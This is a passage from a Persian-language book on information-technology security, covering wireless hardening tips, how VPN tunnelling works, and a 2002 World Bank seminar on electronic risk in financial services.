‫‪ .۱۵‬ﺳﺮﻭﻳﺲ ‪ DHCP‬ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ ﻭ ﺑـﺮﺍﻱ ﻛﺎﺭﺗﻬـﺎﻱ‬
‫ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺧﻮﺩ ﺍﺯ ﺁﺩﺭﺱ ‪ IP‬ﺛﺎﺑـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﻣﺤﺪﻭﺩﺓ ﭘﻴﺶ ﻓﺮﺽ ﺁﺩﺭﺱ ‪ IP‬ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ‬
‫ﺭﺍ ﺍﺯ ﺁﻧﭽﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﻩ ﺗﻌﻴﻴﻦ ﻛﺮﺩﻩ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ‪.‬‬
‫‪ .۱۶‬ﺗﻨﻬﺎ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻗﺎﺑﻞ ﺍﺭﺗﻘﺎ ﺧﺮﻳﺪﺍﺭﻱ ﻛﻨﻴﺪ‪ .‬ﻫﻤﻴـﺸﻪ‬
‫ﭘﻴﺸﺮﻓﺘﻬﺎﻳﻲ ﺩﺭ ﺍﻣﻨﻴﺖ ﺍﻳﻨﮕﻮﻧﻪ ﺍﺑﺰﺍﺭﻫﺎ ﺍﻳﺠﺎﺩ ﻣﻲﺷـﻮﺩ‪ ،‬ﻭ‬
‫ﻟﺬﺍ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﻫﻤﻮﺍﺭﻩ ﺧﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﻧﻘﺎﻁ‬
‫ﺩﺳﺘﺮﺳﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ‪.‬‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﺩﺭ ﺧﺼﻮﺹ ‪VPN‬‬
‫ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻫﺮﻳـﻚ ﺍﺯ‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻣﺬﻛﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ ،‬ﺑﺎﻳﺪ ‪ VPN‬ﺭﺍﻩ ﺍﻧـﺪﺍﺯﻱ ﻛﻨﻴـﺪ‪،‬‬
‫ﺑﻄﻮﺭﻳﻜﻪ ﻫﻤﺔ ‪gateway‬ﻫﺎ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﺍﻳـﻦ‬
‫‪ VPN‬ﺑﺎﺷﻨﺪ ﻭ ﻫﺮ ﻛﺎﺭﺑﺮ ﻫﻨﮕﺎﻡ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﻣـﻮﺭﺩ‬
‫ﺍﻃﻤﻴﻨﺎﻥ‪ ،‬ﺍﺯ ﺍﻳﻦ ﻣﻜـﺎﻧﻴﺰﻡ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ‪ .‬ﺍﺳﺎﺳـﹰﺎ ‪ VPN‬ﻳـﻚ‬
‫ﺍﺗﺼﺎﻝ ﺧﺼﻮﺻﻲ ﻣﻴﺎﻥ ﺩﻭ ﺩﺳﺘﮕﺎﻩ ﺍﺳﺖ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ‬
‫ﺭﺍ ﺩﺭ ﻳﻚ ﺷـﺒﻜﺔ ﻋﻤـﻮﻣﻲ ﻭ ﺑـﻪﺍﺷـﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻪﺷـﺪﻩ ﻣﺜـﻞ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑـﺼﻮﺭﺕ ﺍﻣـﻦ ﺍﻧﺘﻘـﺎﻝ ﻣـﻲﺩﻫـﺪ‪ .‬ﻓﻨـﺎﻭﺭﻱ ‪ VPN‬ﺑـﻪ‬
‫ﺳﺎﺯﻣﺎﻥ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺧﺪﻣﺎﺕ ﺷﺒﻜﺔ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ‬
‫ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﻭﺍﺣﺪﻫﺎ‪ ،‬ﻭ ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﻭ ﺍﺯ ﻃﺮﻳﻖ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺩﻫﺪ‪ .‬ﺑﻪ ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ ‪ VPN‬ﺍﻳﻨﺘﺮﻧﺖ‬
‫ﺭﺍ ﺑﻪ ﻳﻚ ﺷﺒﻜﺔ ﺷﺒﻴﻪﺳﺎﺯﻱﺷﺪﺓ ﺧـﺼﻮﺻﻲ ‪ ٢١٦WAN‬ﺗﺒـﺪﻳﻞ‬
‫ﻣﻲﻛﻨﺪ‪ VPN .‬ﻫﻤﭽﻨﻴﻦ ﺑـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ ﺩﻭﺭ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ‬
‫ﻣﻲﺩﻫﺪ ﻛـﻪ ﺑﺘﻮﺍﻧﻨـﺪ ﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﺷـﺮﻛﺖ ﺧـﻮﺩ‬
‫ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﺷـﺒﻜﺔ ﺍﺭﺗﺒـﺎﻃﻲ ﻭﺳـﻴﻊ‬
‫ﺧﺼﻮﺻﻲ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺑـﺮ ﺩﻭ ﻣـﺎﻧﻊ ﺍﺻـﻠﻲ ﻓـﺎﺋﻖ ﺁﻳﻨـﺪ‪ .‬ﺍﻭﻝ‬
‫ﺍﻳﻨﻜﻪ ﺷﺒﻜﻪﻫﺎ ﻏﺎﻟﺒﹰﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺍﺭﺗﺒـﺎﻁ‬
‫ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ‪ VPN‬ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻋﺒﻮﺭ ﭘﺮﻭﺗﻜﻠﻬﺎﻳﻲ ﻏﻴﺮ ﺍﺯ‬
‫‪ IP‬ﺍﺯ ﻳﻚ ﺷﺒﻜﻪ ﺑﻪ ﺷﺒﻜﺔ ﺩﻳﮕﺮ ﻓﺮﺍﻫﻢ ﻣـﻲﺳـﺎﺯﺩ‪ .‬ﺩﻭﻡ ﺍﻳﻨﻜـﻪ‬
‫ﺑﺴﺘﻪﻫﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺼﻮﺭﺕ ﻣـﺘﻦﺳـﺎﺩﻩ ﺍﻧﺘﻘـﺎﻝ‬
‫‪216 Wide Area Network‬‬
‫‪٢١٣‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻣﻲﻳﺎﺑﻨﺪ‪ ،‬ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻫـﺮﻛﺲ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ ﺗﺮﺍﻓﻴـﻚ ﺍﻳﻨﺘﺮﻧـﺖ ﺭﺍ‬
‫ﺑﺒﻴﻨﺪ‪ ،‬ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧـﺴﺖ ﺍﻃﻼﻋـﺎﺕ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺑـﺴﺘﻪﻫـﺎ ﺭﺍ ﻧﻴـﺰ‬
‫ﻼ‬
‫ﺑﺨﻮﺍﻧﺪ‪ .‬ﺍﻳﻦ ﻳﻚ ﻣﺸﻜﻞ ﺑـﺰﺭﮒ ﺍﺳـﺖ‪ ،‬ﺑﺨـﺼﻮﺹ ﺍﮔـﺮ ﻣـﺜ ﹰ‬
‫ﺑﺎﻧﻜﻬــﺎ ﺑﺨﻮﺍﻫﻨــﺪ ﺍﺯ ﺍﻳﻨﺘﺮﻧــﺖ ﺑــﺮﺍﻱ ﺗﺒــﺎﺩﻝ ﺩﺍﺩﻩﻫــﺎﻱ ﻣﻬــﻢ ﻭ‬
‫ﻣﺤﺮﻣﺎﻧﺔ ﺗﺠﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ VPN .‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜـﺎﻧﻴﺰﻣﻲ‬
‫ﺑﻪ ﻧﺎﻡ ﺗﻮﻧﻞ‪ ٢١٧‬ﺑﺮ ﺍﻳﻦ ﻣﺸﻜﻼﺕ ﻏﻠﺒﻪ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻜـﺎﻧﻴﺰﻡ‬
‫ﺩﺍﺩﻩ ﻫﺎ ﺑﺠﺎﻱ ﺍﺭﺳﺎﻝﺷﺪﻥ ﺑﺼﻮﺭﺕ ﻋﺎﺩﻱ‪ ،‬ﺑﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﺑﻴـﺸﺘﺮ‬
‫ﺍﺑﺘﺪﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺩﺭﻭﻥ ﻳﻚ ﺑﺴﺘﺔ ‪ IP‬ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﻧـﺪ‪،‬‬
‫ﻭ ﺳﭙﺲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻣﻲﮔﺮﺩﻧﺪ‪.‬‬
‫‪217 Tunneling‬‬
‫‪ ۲۱۸‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ‪ IETF‬ﺩﺭﺣﺎﻝ ﺍﺻﻼﺡ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ‪ VPN‬ﺍﺳـﺖ ﺗـﺎ‬
‫‪ IPSec‬ﺭﺍ ﺍﻳﻤﻦﺗﺮ ﻭ ﻧﻴﺰ ﺑﺎ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺎﻫﻮﺍﺭﻩﺍﻱ ﺳﺎﺯﮔﺎﺭ ﻛﻨﺪ‪.‬‬
‫‪Point-to-Point Protocol‬‬
‫‪Link Layer‬‬
‫‪Point-to-Point Tunneling‬‬
‫‪Layer 2 Tunneling Protocol‬‬
‫‪ ۲۲۳‬ﻣﻘﺎﻟﺔ ‪ Karen Bannas‬ﺑﺎ ﻋﻨﻮﺍﻥ "‪ "Safe Passage‬ﺩﺭ ﻣﺠﻠﺔ‬
‫‪ ،PC Magazine‬ﻫﻔــﺖ ﺷــﺮﻛﺖ ﺍﺭﺍﺋــﻪﺩﻫﻨــﺪﺓ ‪ VPN‬ﺭﺍ ﺑــﺮﺍﻱ‬
‫ﻣﺤﺼﻮﻻﺕ ﻣﻨﺎﺳﺐ ﺟﻬﺖ ﻛﺎﺭﺑﺮﺩ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺘﻮﺳﻂ ﺑـﺎ ﺑﻮﺩﺟـﻪﺍﻱ‬
‫ﺣﺪﻭﺩ ﺩﻩ ﻫﺰﺍﺭ ﺩﻻﺭ ﻛﻪ ﺑﻪ ‪ VPN‬ﺑﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﺩﻓﺘـﺮ ﻣﺮﻛـﺰﻱ ﻭ‬
‫ﺷﻌﺒﻪﻫﺎ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪:‬‬
‫‪http://www.pcmag.com/‬‬
‫‪print_article/0,3048,a%3D12352,00.asp‬‬
‫‪219‬‬
‫‪220‬‬
‫‪221‬‬
‫‪222‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺤـﺼﻮﻻﺕ ﻣﺜـﻞ ﻣﺤـﺼﻮﻻﺕ ‪،Cisco ،Nokia‬‬
‫‪ ،Checkpoint ،Nortel‬ﻭ ‪ Microsoft‬ﺩﺍﺭﺍﻱ ﻓﻨــــــﺎﻭﺭﻱ‬
‫‪ VPN‬ﺍﻳﻤﻦ ﻭ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ‪ ٢١٨‬ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻧﻘﺎﻁ ﻣﺨﺘﻠﻒ‬
‫ﺷﺒﻜﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺍﮔﺮﭼﻪ ‪ VPN‬ﺍﺯ ﻣﺤﺘـﻮﺍﻱ ﺩﺍﺩﻩﻫـﺎﻱ ﺗﺒـﺎﺩﻟﻲ‬
‫ﺭﻭﻱ ﺷﺒﻜﻪ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣـﺎ ﺑـﺴﺘﻪ ﺑـﻪ ﺍﻳﻨﻜـﻪ ﭼﮕﻮﻧـﻪ ﺩﺭ‬
‫ﺷـﺒﻜﻪ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪ ﺑﺎﺷــﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻧﺘﻮﺍﻧـﺪ ﺍﺯ ﺩﺳﺘﺮﺳــﻲ‬
‫ﻏﻴﺮﻣﺠﺎﺯ ﺍﺯ ﺑﻴﺮﻭﻥ ﺷﺒﻜﻪ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳـﺪ‪ .‬ﺑـﻪ ﻋﺒـﺎﺭﺕ ﺩﻳﮕـﺮ‬
‫ﻫﺮﭼﻨﺪ ﻛﺎﺭﺑﺮ ﻏﻴﺮﻣﺠﺎﺯ ﺑﺨﺎﻃﺮ ﻭﺟﻮﺩ ‪ VPN‬ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﺤﺘـﻮﺍﻱ‬
‫ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺑﺒﻴﻨﺪ‪ ،‬ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻤﭽﻨﺎﻥ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﻣﻨﺎﺑﻊ ﺷﺒﻜﻪ‬
‫ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ ﻭ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺭﺍ ﺑﮕﻮﻧـﻪﺍﻱ ﺗﻐﻴﻴـﺮ ﺩﻫـﺪ ﻛـﻪ‬
‫ﻇﺮﻓﻴﺖ ﺷﺒﻜﻪ ﺳﺮﺭﻳﺰ ﺷﻮﺩ ﻭ ﻋﻠﻴﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺠﺎﺯ ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ‬
‫ﺳﺮﻭﻳﺲ ﺍﻧﺠـﺎﻡ ﮔﻴـﺮﺩ‪ .‬ﻛﻨﺘـﺮﻝ ﺩﺳﺘﺮﺳـﻲ‪ ،‬ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻭ‬
‫ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺍﺯ ﻋﻨﺎﺻــﺮ ﺣﻴــﺎﺗﻲ ﻳــﻚ ﺍﺗــﺼﺎﻝ ﺍﻣــﻦ ﻫــﺴﺘﻨﺪ‪ .‬ﺍﺯ‬
‫ﭘﺮﻭﺗﻜﻞ ﻧﻘﻄﻪ ﺑﻪ ﻧﻘﻄﻪ )‪ ٢١٩(PPP‬ﺑﺮﺍﻱ ﻣﺪﺕ ﻣﺪﻳـﺪﻱ ﺑﻌﻨـﻮﺍﻥ‬
‫ﭘﺮﻭﺗﻜﻞ ﺟﻬﺎﻧﻲ ﻻﻳﺔ ﺍﺗﺼﺎﻝ‪ ٢٢٠‬ﺟﻬﺖ ﺍﻳﺠﺎﺩ ﺗﻮﻧﻞ ﻣﻴﺎﻥ ﺍﺑﺰﺍﺭﻫـﺎ‬
‫ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪ؛ ﺍﻣﺎ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﭘﺮﻭﺗﻜﻞ ﺗﻮﻧـﻞ‬
‫‪٢٢٢‬‬
‫ﻧﻘﻄﻪ ﺑﻪ ﻧﻘﻄﻪ )‪٢٢١(PPTP‬ﻭ ﭘﺮﻭﺗﻜﻞ ﺗﻮﻧﻞ ﻻﻳـﺔ ﺩﻭ )‪(L2TP‬‬
‫‪٢٢٣‬‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺗﺮﺟﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫‪٢١٥‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻓﺼﻞ ﺳﻴﺰﺩﻫﻢ‬
‫ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‬
‫ﭘﻴﺮﺍﻣﻮﻥ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺳﻤﻴﻨﺎﺭ ﺟﻬﺎﻧﻲ ﺳﺎﻝ ‪:۲۰۰۲‬‬
‫‪٢٢٥‬‬
‫ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﻩ ﺩﺭ ﺣﻮﺯﺓ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ‬
‫ﺟﻠﺴﻪ ﺑﺎ ﻣﻘﺪﻣـﻪﺍﻱ ﺑـﺮ ﻣﺨـﺎﻃﺮﺓ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ ٢٢٦‬ﺁﻏـﺎﺯ ﺷـﺪ ﻭ‬
‫ﻣﻘﺎﻻﺕ ﺑﻪ ﺗﺒﺪﻳﻞ ﺷﺪﻥ "ﺷﺒﻜﻪﻫﺎﻱ ﺑﺴﺘﻪ" ﺑﻪ "ﺷﺒﻜﻪﻫـﺎﻱ ﺑـﺎﺯ"‬
‫ﺩﺭ ﺧﻼﻝ ﺩﻩ ﺳـﺎﻝ ﺍﺧﻴـﺮ ﺍﺷـﺎﺭﻩ ﺩﺍﺷـﺘﻨﺪ‪ .‬ﺩﺭ ﺷـﺒﻜﻪﻫـﺎﻱ ﺑـﺎﺯ‪،‬‬
‫ﻭﺍﺑﺴﺘﮕﻲ ﺑﻪ ﻗﺎﺑﻠﻴﺘﻬـﺎﻳﻲ ﻣﺜـﻞ ‪ SSL‬ﻛـﻪ ﺍﺧﻴـﺮﹰﺍ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺁﻥ‬
‫ﺷﻜﺴﺘﻪ ﺷﺪﻩ ﺑﻮﺩ ﺑﺎﻋﺚ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺗﻲ ﻣﻲﺷﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺍﻳﻦ ﺍﻣﺮ‬
‫‪ ۲۲۴‬ﻓﺎﻳﻞ ﻭﻳﺪﺋﻮﻳﻲ ﺧﻼﺻﺔ ﻣﺬﺍﻛﺮﺍﺕ ﻧﺸـﺴﺘﻬﺎﻱ ﺳـﺎﻟﻬﺎﻱ ‪ ۲۰۰۲‬ﻭ ‪۲۰۰۳‬‬
‫ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺑﺘﺮﺗﻴﺐ ﺑﺎ ﺁﺩﺭﺳﻬﺎﻱ ﺯﻳـﺮ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ‬
‫ﻫﺴﺘﻨﺪ‪:‬‬
‫‪http://www.worldbank.org/wbi/B-Span/sub_e‬‬‫‪security.htm‬‬
‫‪http://www1.worldbank.org/finance‬‬
‫‪ ۲۲۵‬ﺍﻳﻦ ﺟﻠﺴﻪ ﺑﺎ ﺣﻀﻮﺭ ﺍﻋـﻀﺎﻱ ﮔـﺮﻭﻩ ﻳﻜﭙﺎﺭﭼـﻪﺳـﺎﺯﻱ ﺑﺎﻧـﻚ ﺟﻬـﺎﻧﻲ‬
‫ﺑﺮﮔـﺰﺍﺭ ﺷﺪ‪ .‬ﺍﻋﻀـﺎﻱ ﺣﺎﺿﺮ ﺩﺭ ﺟﻠﺴـﻪ ﻋﺒﺎﺭﺕ ﺑﻮﺩﻧﺪ ﺍﺯ‪Thomas :‬‬
‫‪ ،Tom Kellerman ،Glaessner‬ﻭ ‪،Valerie McNevin‬‬
‫ﺑﻌﻼﻭﺓ ﺷﺮﻛﺖﻛﻨﻨﺪﮔﺎﻥ ﺩﺭ ﺍﻳﻦ ﺳﻤﻴﻨﺎﺭ ﺟﻬﺎﻧﻲ ﺍﺯ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺑﺮﺯﻳﻞ‪،‬‬
‫ﺷﻴﻠﻲ‪ ،‬ﻣﻜﺰﻳﻚ‪ ،‬ﺍﻭﻛﺮﺍﻳﻦ‪ ،‬ﺍﺳﻠﻮﻭﺍﻛﻲ‪ ،‬ﺳﻨﮕﺎﭘﻮﺭ‪ ،‬ﻛﺮﺓ ﺟﻨﻮﺑﻲ‪ ،‬ﻓﻴﻠﻴﭙـﻴﻦ‪،‬‬
‫ﻫﻨﮓﻛﻨﮓ‪ ،‬ﺳﺮﻳﻼﻧﻜﺎ‪ ،‬ﻭ ﺟﻤﻬﻮﺭﻱ ﺧﻠﻖ ﭼﻴﻦ‬
‫‪226 E-Risk‬‬
‫ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﺨـﺼﻮﺹ ﺩﺭ ﻧﻔﻮﺫﻫـﺎﻳﻲ ﻛـﻪ ﺍﺯ‬
‫ﺍﺭﻭﭘﺎﻱ ﺷﺮﻗﻲ ﻋﻠﻴﻪ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺍﻧﺠـﺎﻡ ﻣـﻲ ﮔﻴـﺮﺩ ﻏﺎﻟﺒـﹰﺎ ﻳـﺎ‬
‫ﺳﺮﻗﺖ ﻫﻮﻳﺖ ﻭ ﻳﺎ ﺍﺧﺎﺫﻱ ﺑﻮﺩﻩﺍﻧﺪ‪ .‬ﺭﻭﺷﻬﺎﻱ ﺩﻳﮕﺮ ﻧﻴﺰ ﻋﺒﺎﺭﺗﻨـﺪ‬
‫ﺍﺯ ‪ ،٢٢٧salami slicing‬ﺍﻧﺘﻘــﺎﻝ ﺳــﺮﻣﺎﻳﻪ‪ ،‬ﻭ ﺩﺳــﺘﻜﺎﺭﻱ ﺩﺭ‬
‫ﺳــﻬﺎﻡ‪ .‬ﺩﺭ ﺁﺳــﻴﺎ‪ ،‬ﻧﻔﻮﺫﻫــﺎ ﻣﺘﻮﺟــﻪ ﺍﻫــﺪﺍﻑ ﻣــﺸﺨﺺ ﺑﺨــﺶ‬
‫ﺍﻗﺘﺼﺎﺩﻱ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻫﺪﺍﻑ ﺣﻴـﺎﺗﻲ ﺑﺨـﺸﻬﺎﻱ ﻓﻨـﺎﻭﺭﻱ ﺑـﻮﺩﻩ‬
‫ﺍﺳﺖ‪.‬‬
‫ﺑﺤـــﺚ ﻣﻘـــﺪﻣﺎﺗﻲ ﻣﺨـــﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـــﻲ ﺑـــﻪ ﻣﻮﺿـــﻮﻉ‬
‫ﺁﺳﻴﺐ ﭘﺬﻳﺮﻳﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺑﺨـﺼﻮﺹ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ‪GSM‬‬
‫ﻫﻢ ﭘﺮﺩﺍﺧﺖ‪ .‬ﺑﻪ ﺩﻭ ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺑﻲﺳـﻴﻢ ﺍﺷـﺎﺭﻩ ﺷـﺪ ﻛـﻪ ﻋﺒـﺎﺭﺕ ﺑﻮﺩﻧـﺪ ﺍﺯ ﺁﺳـﻴﺐ ﭘـﺬﻳﺮﻳﻬﺎﻱ‬
‫‪ gateway‬ﻭ ﺣﻤـﻼﺕ "‪ ."man in the middle‬ﻣـﻮﺭﺩ ﺩﻭﻡ‬
‫ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺍﺗﻔﺎﻕ ﻣﻲﺍﻓﺘﺪ ﻛﻪ ﺑﺮﺟﻬﺎﻱ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﻧﻤﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺗﻠﻔﻨﻬﺎﻱ ﻫﻤﺮﺍﻩ ﺗﺼﺪﻳﻖ ﻛﻨﻨﺪ‪.‬‬
‫ﻧﻜﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﻗﻮﺍﻧﻴﻦ ﻭ ﺿﻮﺍﺑﻂ‬
‫ﺩﺭﺣﺎﻟﻴﻜﻪ ﻗﻮﺍﻧﻴﻦ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﭘﻨﺞ ﺳﺎﻝ ﻗﺒﻞ ﭼﻨـﺪﺍﻥ‬
‫ﻣﺮﺳﻮﻡ ﻧﺒﻮﺩﻧﺪ‪ ،‬ﺍﻣﺮﻭﺯ ﭼﻬﻞ ﻛﺸﻮﺭ ﺩﺍﺭﺍﻱ ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﻫـﺴﺘﻨﺪ ﻭ‬
‫ﺍﻳــﻦ ﺭﻗــﻢ ﻧﻴــﺰ ﺩﺭﺣــﺎﻝ ﺍﻓــﺰﺍﻳﺶ ﺍﺳــﺖ‪ .‬ﻗــﻮﺍﻧﻴﻦ ﻣﺮﺑــﻮﻁ ﺑــﻪ‬
‫ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺣﻘﻮﻕ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻣﺼﺮﻑﻛﻨﻨـﺪﻩ ﺍﺯ‬
‫ﺍﻫﻤﻴــﺖ ﺧﺎﺻــﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧــﺪ ﻭ ﺑــﺴﺮﻋﺖ ﺩﺭﺣــﺎﻝ ﮔــﺴﺘﺮﺵ‬
‫ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﻣﻮﺿﻮﻋﺎﺕ ﻛﻠﻴﺪﻱ ﺍﻳﻦ ﺑﺤﺚ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
